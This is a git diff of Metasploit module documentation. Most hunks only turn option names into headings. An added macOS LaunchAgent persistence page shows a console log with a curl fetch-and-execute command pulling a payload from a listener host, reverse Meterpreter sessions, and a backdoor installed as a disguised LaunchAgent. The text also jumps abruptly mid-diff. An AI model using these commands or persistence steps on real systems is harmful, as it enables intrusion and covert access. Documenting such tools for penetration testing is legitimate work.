b/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md index 9a9c9b7f77680..8403b60b78a99 100644 --- a/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md +++ b/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md @@ -34,10 +34,10 @@ msf exploit(rails_actionpack_inline_exec) > run To use this module, you must manually discover the correct values for these datastore options: -**TARGETURI** +### TARGETURI The path to a vulnerable Ruby on Rails application. -**TARGETPARAM** +### TARGETPARAM The target parameter to inject with inline code. diff --git a/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md b/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md index a78873f21415c..63fc69334829e 100644 --- a/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md +++ b/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md @@ -29,7 +29,7 @@ You can use . 3. `run` ## Options -**ENC_KEY** +### ENC_KEY The encryption key the target Apache Shiro server is using to encrypt its `rememberMe` cookies. ## Scenarios diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 39e72013c343f..008d6862fd2e7 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -35,14 +35,14 @@ This module has been tested successfully against: ## Options - **EnableOverwrite** +### EnableOverwrite Overwrites an app of the same name. Needed if you change the app code in the tgz. Default is `false` - **USERNAME** +### USERNAME Username for Splunk. Default is `admin` - **PASSWORD** +### PASSWORD Default is `changeme` ## Scenarios diff --git a/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md b/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md index 5b41ba303ab7e..61215793fbcab 100644 --- a/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md +++ b/documentation/modules/exploit/multi/http/struts2_content_type_ognl.md @@ -16,11 +16,11 @@ https://mvnrepository.com/artifact/org.apache.struts/struts2-showcase ## Options -**TARGETURI** +### TARGETURI The path to a struts application action -**VHOST** +### VHOST The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional. diff --git a/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md index 0c1caed2698ed..8d253def05aa1 100644 --- a/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md +++ b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md @@ -107,11 +107,11 @@ echo "Struts container is listening on $IPADDRESS:$PORT_NUM" ## Options - **TARGETURI** +### TARGETURI The path to the struts application. Note that this does not include the endpoint. In the environment above, the path is `/`. - **ACTION** +### ACTION The endpoint name. In the environment above, the endpoint is `help.action`. diff --git a/documentation/modules/exploit/multi/http/struts2_rest_xstream.md b/documentation/modules/exploit/multi/http/struts2_rest_xstream.md index f9331fb9ef98e..7af5b9d609d35 100644 --- a/documentation/modules/exploit/multi/http/struts2_rest_xstream.md +++ b/documentation/modules/exploit/multi/http/struts2_rest_xstream.md @@ -14,11 +14,11 @@ https://mvnrepository.com/artifact/org.apache.struts/struts2-rest-showcase ## Options -**TARGETURI** +### TARGETURI The path to a struts application action -**VHOST** +### VHOST The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional. diff --git a/documentation/modules/exploit/multi/http/struts_dmi_exec.md b/documentation/modules/exploit/multi/http/struts_dmi_exec.md index 682c6e2d42902..929b10609354d 100644 --- a/documentation/modules/exploit/multi/http/struts_dmi_exec.md +++ b/documentation/modules/exploit/multi/http/struts_dmi_exec.md @@ -34,7 +34,7 @@ And now you have a vulnerable server. ## Options -**TMPPATH** +### TMPPATH By default, the struts_dmi_exec exploit should be ready to go without much configuration. However, in case you need to change where the payload should be uploaded to, make sure to set the correct diff --git a/documentation/modules/exploit/multi/http/struts_dmi_rest_exec.md b/documentation/modules/exploit/multi/http/struts_dmi_rest_exec.md index dd1c72f4872aa..26e786ead9fc3 100644 --- a/documentation/modules/exploit/multi/http/struts_dmi_rest_exec.md +++ b/documentation/modules/exploit/multi/http/struts_dmi_rest_exec.md @@ -34,7 +34,7 @@ And now you have a vulnerable server. ## Options -**TMPPATH** +### TMPPATH By default, the struts_dmi_rest_exec exploit should be ready to go without much configuration. However, in case you need to change where the payload should be uploaded to, make sure to set the correct diff --git a/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md b/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md index f41db2deaa738..9163570bc926a 100755 --- a/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md +++ b/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md @@ -25,17 +25,17 @@ vBulletin 5.x through 5.5.4 allows remote command execution via the `widgetConfi ## Options -**PHP_CMD** +### PHP_CMD Specify the PHP function in which you want execute the payload. Default: `shell_exec` -**TARGETURI** +### TARGETURI The base URI path of vBulletin. Default: / ### Advanced Options -**ForceExploit** +### ForceExploit Override check result. diff --git a/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md b/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md index 6ad92f78e1efd..fb9acf46670d6 100644 --- a/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md +++ b/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md @@ -12,7 +12,7 @@ which can then be executed by requesting the uploaded file location. ## Options -**PHPSHORTTAG** +### PHPSHORTTAG Specify the use of php short tag, `/com.system.update` + +### KEEPALIVE + +Continually restart the payload exe if it crashes/exits. Defaults to `true` + +### RUN_NOW + +Run the installed payload immediately. Defaults to `false` + +### LAUNCH_ITEM + +Type of launch item, see description for more info. Choices are `LaunchAgent`, `LaunchDaemon`. Default is `LaunchAgent` + +## Scenarios + +### 13.7.4 + +Initial access via web delivery + +``` +[*] Processing /root/.msf4/msfconsole.rc for ERB directives. +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111 +lhost => 111.111.1.111 +resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery +[*] Using configured payload python/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set target 8 +target => 8 +resource (/root/.msf4/msfconsole.rc)> set srvport 8383 +srvport => 8383 +resource (/root/.msf4/msfconsole.rc)> set payload payload/osx/x64/meterpreter_reverse_tcp +payload => osx/x64/meterpreter_reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set lport 4747 +lport => 4747 +resource (/root/.msf4/msfconsole.rc)> set URIPATH m +URIPATH => m +resource (/root/.msf4/msfconsole.rc)> run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +[*] Started reverse TCP handler on 111.111.1.111:4747 +[*] Using URL: http://111.111.1.111:8383/m +[*] Server started. +[*] Run the following command on the target machine: +curl -sk --output 8D4tNTA4 http://111.111.1.111:8383/m; chmod +x 8D4tNTA4; ./8D4tNTA4& disown +[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > +[*] 222.22.2.2 web_delivery - Delivering Payload (815032 bytes) +[*] Meterpreter session 1 opened (111.111.1.111:4747 -> 222.22.2.2:49156) at 2025-02-19 19:04:25 -0500 +[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/osx/persistence/launch_plist +[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp +[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) > sessions -i 1 +[*] Starting interaction with 1... +(Meterpreter 1)(/Users/macos) > getuid +Server username: macos +(Meterpreter 1)(/Users/macos) > sysinfo +Computer : 20.20.20.21 +OS : macOS Ventura (macOS 13.7.4) +Architecture : x86 +BuildTuple : x86_64-apple-darwin +Meterpreter : x64/osx +``` + +Persistence + +``` +[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > set session 1 +session => 1 +[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > set payload payload/osx/x64/meterpreter_reverse_tcp +payload => osx/x64/meterpreter_reverse_tcp +[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > exploit +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. +[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) > +[*] Started reverse TCP handler on 111.111.1.111:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. /Users/macos/Library is writable +[*] Dropping backdoor executable... +[+] Backdoor stored to /Users/macos/Library/.QVecGcAF/com.system.update +[+] LaunchAgent added: /Users/macos/Library/LaunchAgents/com.system.update.plist +[+] LaunchAgent installed successfully. +[*] To remove the persistence, run: +rm -rf /Users/macos/Library/.QVecGcAF ; rm /Users/macos/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update +[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250219.0704/20.20.20.21_20250219.0704.rc +[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) > sessions -i 1 +[*] Starting interaction with 1... +(Meterpreter 1)(/Users/macos) > shell +Process 2138 created. +Channel 8 created. +launchctl load -w /Users/macos/Library/LaunchAgents/com.system.update.plist +[*] Meterpreter session 5 opened (111.111.1.111:4444 -> 222.22.2.2:49157) at 2025-02-19 19:11:23 -0500 +``` diff --git a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md index 826941c1d0a46..651f20c3b0abc 100644 --- a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md +++ b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md @@ -32,11 +32,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md b/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md index 68707775e77ee..8f1bfbcec0ccb 100644 --- a/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md @@ -38,15 +38,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions`. - **DTAPPGATHER_PATH** +### DTAPPGATHER_PATH Path to `dtappgather` executable. (default: `/usr/dt/bin/dtappgather`) - **SUID_PATH** +### SUID_PATH Path to suid executable. (default: `/usr/bin/at`) diff --git a/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md b/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md index a54c6741475b1..0a7b0138532b9 100644 --- a/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md @@ -32,11 +32,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **SUID_PATH** +### SUID_PATH Path to suid executable (must be linked to a vulnerable version of `libnspr4.so`) (default: `/usr/bin/cancel`) diff --git a/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md b/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md index 8c55a8b014b4b..42ddf4cc8f1c1 100644 --- a/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md @@ -40,15 +40,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions`. - **RSH_PATH** +### RSH_PATH Path to rsh executable. (default: `/usr/bin/rsh`) - **WORKERS** +### WORKERS Number of workers. (default: `10`) diff --git a/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md b/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md index 3126d0fd5e7e9..022a2f546ea2f 100644 --- a/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md @@ -33,11 +33,11 @@ ## Options - **XSCREENSAVER_PATH** +### XSCREENSAVER_PATH Path to `xscreensaver` executable. (default: `/usr/bin/xscreensaver`) - **XORG_PATH** +### XORG_PATH Path to `Xorg` executable. (default: `/usr/bin/Xorg`) diff --git a/documentation/modules/exploit/unix/fileformat/imagemagick_delegate.md b/documentation/modules/exploit/unix/fileformat/imagemagick_delegate.md index 534503e203af2..cab5a4d22a9d1 100644 --- a/documentation/modules/exploit/unix/fileformat/imagemagick_delegate.md +++ b/documentation/modules/exploit/unix/fileformat/imagemagick_delegate.md @@ -14,7 +14,7 @@ ## Options - **USE_POPEN** +### USE_POPEN When the default option `true` is used, targets 0 (SVG file) and 1 (MVG file) are valid When the option is set to `false`, target 2 (PS file) is valid diff --git a/documentation/modules/exploit/unix/http/pfsense_clickjacking.md b/documentation/modules/exploit/unix/http/pfsense_clickjacking.md index f286991927517..96eb3b840ddf8 100644 --- a/documentation/modules/exploit/unix/http/pfsense_clickjacking.md +++ b/documentation/modules/exploit/unix/http/pfsense_clickjacking.md @@ -18,6 +18,6 @@ The victim should be able to access the WebGUI & must be logged in as admin in o ## Options -**TARGETURI** +### TARGETURI The base path of the WebGUI. The default base path is https://192.168.1.1/ diff --git a/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md b/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md index 38f8bacaa938c..c0574cd9863ba 100644 --- a/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md +++ b/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md @@ -26,7 +26,7 @@ ## Options - **AGENT_VERSION** +### AGENT_VERSION A valid Windows agent version must be specified. (default: `8.0.152`) @@ -35,11 +35,11 @@ Additionally, various agent versions are listed on the KACE website. - **ORGANIZATION** +### ORGANIZATION Organization ID used within the appliance. (default: `1`) - **SERIAL** +### SERIAL Serial number for the appliance. By default, the module attempts to retrieve the serial from `/common/about.php`. diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index 42fb1969d4475..4d67511934735 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -19,7 +19,7 @@ This module exploits an inadequate access control vulnerability creating a malic This module can be as simple as setting the `RHOST` and `NEW_PASSWORD` option, and you're ready to go. -**NEW_PASSWORD** +### NEW_PASSWORD You should set a new SSH password to the vulnerable device. diff --git a/documentation/modules/exploit/unix/local/netbsd_mail_local.md b/documentation/modules/exploit/unix/local/netbsd_mail_local.md index 695649aed56ab..81aadf8ecb631 100644 --- a/documentation/modules/exploit/unix/local/netbsd_mail_local.md +++ b/documentation/modules/exploit/unix/local/netbsd_mail_local.md @@ -91,16 +91,16 @@ Background session 1? [y/N] y ## Options - **ATRUNPATH** +### ATRUNPATH File location of atrun, defaults to `/usr/libexec/atrun` - **MAILDIR** +### MAILDIR Location of mail folder, defaults to `/var/mail` - **WritableDir** +### WritableDir Location of a writable directory for our payload, defaults to `/tmp` - **ListenerTimeout** +### ListenerTimeout Since this exploit utilized a cron which has a 10min timer, the listener timeout needs to be 10min + padding. Defaults to `603` seconds (10min, 3sec) ## Scenarios @@ -200,4 +200,4 @@ sHXbQbHqFIbnZGoFWlZoppGprWyKwFCr nDpSrEmQhDuVSxIpILWCOABbMOIAWUTx whoami root -``` \ No newline at end of file +``` diff --git a/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md b/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md index 4665830e68f19..1db242090a988 100644 --- a/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md +++ b/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md @@ -19,7 +19,7 @@ Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that / ## Options -**MAILTO** +### MAILTO A valid e-mail recipient. Usually, admin@targetdomain.com can be used. diff --git a/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md b/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md index 10dfbca68ab39..e7bf45bf6c4c6 100644 --- a/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md @@ -20,11 +20,11 @@ This module has been tested with [Ajenti 2.1.31](https://pypi.org/project/ajenti ## Options -**RPORT** +### RPORT Set this to the Ajenti port. The default is 8000. -**TARGETURI** +### TARGETURI Set this to the Ajenti base path. The default is `/`. diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index ad946cc7b4f5c..86bcb29d61e86 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md @@ -43,32 +43,32 @@ viable in that regard. ## Options -**TARGETURI** +### TARGETURI Set this to the remote path of the vulnerable Drupal install. Defaults to `/` for the web root. -**PHP_FUNC** +### PHP_FUNC Set this to the PHP function you'd like to execute. Defaults to `passthru`. -**DUMP_OUTPUT** +### DUMP_OUTPUT Enable this if you'd like to see HTTP responses, including command output. Defaults to `false` unless `cmd/unix/generic` is your payload. -**VERBOSE** +### VERBOSE Enable this to show what function and command were executed. Defaults to `false` due to the sometimes excessive output. -**ForceExploit** +### ForceExploit Enable this to force exploitation regardless of the check result. Defaults to `false`, meaning the check result is respected. -**WritableDir** +### WritableDir Set this to a writable directory without `noexec` for binary payloads. Defaults to `/tmp`, but other options may include `/var/tmp` and diff --git a/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md b/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md index 27341f39468ea..a553cb41130f3 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md +++ b/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md @@ -36,16 +36,16 @@ Id Name ## Options -**METHOD** +### METHOD Set this to the HTTP method to use. `POST` and `GET` (cached) are known to work. -**NODE** +### NODE Set this to a node ID on the target when using the `GET` method. -**DUMP_OUTPUT** +### DUMP_OUTPUT Enable this if you'd like to see HTTP responses, including command output. Defaults to `false` unless `cmd/unix/generic` is your payload. diff --git a/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md b/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md index 612710e193173..db0734fc4fd76 100644 --- a/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md @@ -49,7 +49,7 @@ ## Options - **TARGETURI** +### TARGETURI The base path to elFinder (default: `/elFinder/`) diff --git a/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md b/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md index 48d9b03a177b7..e7f39c4c21e0c 100644 --- a/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md @@ -32,15 +32,15 @@ ## Options - **TARGETURI** +### TARGETURI The base path to FusionPBX (default: `/`) - **USERNAME** +### USERNAME The username for FusionPBX (default: `admin`) - **PASSWORD** +### PASSWORD The password for FusionPBX diff --git a/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md b/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md index 70923bdaf7c57..d6ccaa0f265af 100644 --- a/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md @@ -55,15 +55,15 @@ ## Options - **TARGETURI** +### TARGETURI The base path to FusionPBX (default: `/`) - **USERNAME** +### USERNAME The username for FusionPBX - **PASSWORD** +### PASSWORD The password for FusionPBX diff --git a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md index 97886923ca855..20ed452da2e7a 100644 --- a/documentation/modules/exploit/unix/webapp/jquery_file_upload.md +++ b/documentation/modules/exploit/unix/webapp/jquery_file_upload.md @@ -27,7 +27,7 @@ Id Name ## Options -**TARGETURI** +### TARGETURI Set this to the base path of jQuery File Upload. `/jQuery-File-Upload` and those including a version are common. `/upload` may be another. diff --git a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md index e81ee1c877e69..2c8985debc1aa 100644 --- a/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md +++ b/documentation/modules/exploit/unix/webapp/openmediavault_rpc_rce.md @@ -25,15 +25,15 @@ ## Options - **TARGETURI** +### TARGETURI The URI path for OpenMediaVault installation - **USERNAME** +### USERNAME The username for OpenMediaVault - **PASSWORD** +### PASSWORD The password for OpenMediaVault diff --git a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md index 2ba01b30fb3b8..c475fe859a416 100644 --- a/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md @@ -24,7 +24,7 @@ Launch metasploit and set the appropriate options: ## Options -**VHOST** +### VHOST The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional. diff --git a/documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md b/documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md index 7e59153c7f58f..5b4f70c00428d 100644 --- a/documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md +++ b/documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md @@ -72,15 +72,15 @@ This example assumes your MySQL root password is **password** ## Options -**TARGETURI** +### TARGETURI Path of the Piwik installation. -**USERNAME** +### USERNAME Valid username for a Piwik superuser account. -**PASSWORD** +### PASSWORD Valid password for a Piwik superuser account. diff --git a/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md b/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md index 40c91525ae8ab..7c3e6f2d32ab9 100644 --- a/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md @@ -24,7 +24,7 @@ ## Options - **TARGETURI** +### TARGETURI The base path to rConfig install directory (default: `/install/`) diff --git a/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md b/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md index 422c58d9cd92c..6cabe11d88345 100644 --- a/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md +++ b/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md @@ -8,7 +8,7 @@ This module has been tested with [Webmin 1.900](https://sourceforge.net/projects ## Options -**GUESSUPLOAD** +### GUESSUPLOAD Use default installation path `/usr/share/webmin/` diff --git a/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md b/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md index d85a30f52fa25..6a7c40eb3b9f6 100644 --- a/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md +++ b/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md @@ -22,7 +22,7 @@ This was tested on Ubuntu 15.04. YMMV. ## Options -**VERBOSE** +### VERBOSE If you'd like to see what requests are being sent, set this to `true`. You should see the Exim prestager commands being sent to the target. diff --git a/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md b/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md index 72ff66756acd4..8323349046625 100644 --- a/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md +++ b/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md @@ -27,15 +27,15 @@ ## Options - **TARGETURI** +### TARGETURI The base path to WordPress (default: `/`) - **USERNAME** +### USERNAME The username for WordPress - **PASSWORD** +### PASSWORD The password for WordPress diff --git a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md index 711bcfaa6b046..c277e8a33e1e4 100644 --- a/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md +++ b/documentation/modules/exploit/unix/webapp/xymon_useradm_cmd_exec.md @@ -50,15 +50,15 @@ ## Options - **TARGETURI** +### TARGETURI The base path to Xymon secure CGI directory (default: `/xymon-seccgi/`) - **USERNAME** +### USERNAME The username for Xymon - **PASSWORD** +### PASSWORD The password for Xymon diff --git a/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md b/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md index b900f06a9e20b..0ed511716cdb0 100644 --- a/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md +++ b/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md @@ -15,11 +15,11 @@ ## Options - **CMD** +### CMD Optional command line to run instead of attempting to directly inject a payload - **RPORT** +### RPORT The port the service is running on. Default is 38292. diff --git a/documentation/modules/exploit/windows/backupexec/ssl_uaf.md b/documentation/modules/exploit/windows/backupexec/ssl_uaf.md index 969c4344f047a..34c5a685427a5 100644 --- a/documentation/modules/exploit/windows/backupexec/ssl_uaf.md +++ b/documentation/modules/exploit/windows/backupexec/ssl_uaf.md @@ -156,16 +156,16 @@ few exploit-specific options. These should not normally need to be set or changed from their default values in most situations as the exploit will pick suitable values for them depending on the target selected. -**NumSpraySockets** +### NumSpraySockets The number of sockets connected to the remote agent in order to spray stage 1 of the exploit, which should overwrite the freed `BIO`. -**NumTLSSpraySockets** +### NumTLSSpraySockets The number of sockets connected to the remote agent in order to spray TLS extensions. This is used to massage the low fragmentation heap in order to increase chances of stage 1 successfully overwriting the freed `BIO`. -**NumTriggerAttempts** +### NumTriggerAttempts The number of attempts made to trigger the use-after-free for Windows 8+ targets, where it is possible to retry calling the overwritten function pointer multiple times. diff --git a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md index 23c817909fbc9..723fdf5393a40 100644 --- a/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md +++ b/documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md @@ -11,11 +11,11 @@ This module exploits the Windows OLE Automation array vulnerability, [CVE-2014-6 ## Options -**TRYUAC** +### TRYUAC Ask victim to start as Administrator. This option only works on Windows 7 targets. -**AllowPowershellPrompt** +### AllowPowershellPrompt Allow exploit to try Powershell. If exploiting a Windows 7 target you need to enable this option. diff --git a/documentation/modules/exploit/windows/fileformat/adobe_geticon.md b/documentation/modules/exploit/windows/fileformat/adobe_geticon.md index 6710c1bca32d8..ff48defb7ec4d 100644 --- a/documentation/modules/exploit/windows/fileformat/adobe_geticon.md +++ b/documentation/modules/exploit/windows/fileformat/adobe_geticon.md @@ -20,7 +20,7 @@ Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/downl ## Options - **FILENAME** +### FILENAME The file name diff --git a/documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md b/documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md index 7e1a1693fc80c..9ef8f51f1311a 100644 --- a/documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md +++ b/documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md @@ -19,19 +19,19 @@ Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/downl ## Options - **EXENAME** +### EXENAME The Name of payload exe. - **FILENAME** +### FILENAME The output filename. - **INFILENAME** +### INFILENAME The Input PDF filename. - **LAUNCH_MESSAGE** +### LAUNCH_MESSAGE The message to display in the `File:` area of the PDF. diff --git a/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md b/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md index 9f3b6e28c8a82..f193abbd790a9 100644 --- a/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md +++ b/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md @@ -22,11 +22,11 @@ Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/downl ## Options - **FILENAME** +### FILENAME The file name. - **OBFUSCATE** +### OBFUSCATE Enable JavaScript obfuscation diff --git a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md index b154a0f312831..42572705df94f 100644 --- a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md +++ b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md @@ -26,7 +26,7 @@ ## Options - **FILENAME** +### FILENAME The filename that the shellcode gets written to. Setting a filename is not required, as there is a default name already set. diff --git a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md index 8cea0139fd203..42a2ea1582831 100644 --- a/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md +++ b/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md @@ -30,15 +30,15 @@ To set up the vulnerable environment, install a Windows version without the patc ## Options -**FILENAME** +### FILENAME The file name of the LNK file. This file name can be renamed later. If the value is not set, a random name will be generated. 